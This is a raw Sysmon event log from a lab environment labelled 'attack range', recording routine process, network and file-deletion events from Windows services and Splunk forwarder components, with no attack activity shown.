11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A6F-6216-6605-000000003902}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A6F-6216-6605-000000003902}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.200{4F8D34B0-1A6F-6216-6605-000000003902}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.872{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=757A5E450DAA14AAC47F0088285C3A67,SHA256=A2C3AC7E187BFF89FCDEA19C22CB2BD972EE8078B81688F761FB7D9D22575221,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.297{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51789-false10.0.1.12-8089- 354300x8000000000000000299617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:46.551{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49630-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:48.355{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0561D8109C6D9633019D44DB5040320,SHA256=E12C226131DD5F5496813C95ADD84EEFB3D174E16A1E5E062576BB07146C50FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.905{4F8D34B0-1A71-6216-6805-000000003902}33483208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:49.373{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B64E757CB220DB9EF979E8CDD035A06,SHA256=04BD70933EA1FD69EF704469D834819D8D016BC4356DEAC2E35864B26B523B2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A71-6216-6805-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A71-6216-6805-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.669{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A71-6216-6805-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.670{4F8D34B0-1A71-6216-6805-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:49.204{4F8D34B0-1A70-6216-6705-000000003902}39483068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A70-6216-6705-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:48.997{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 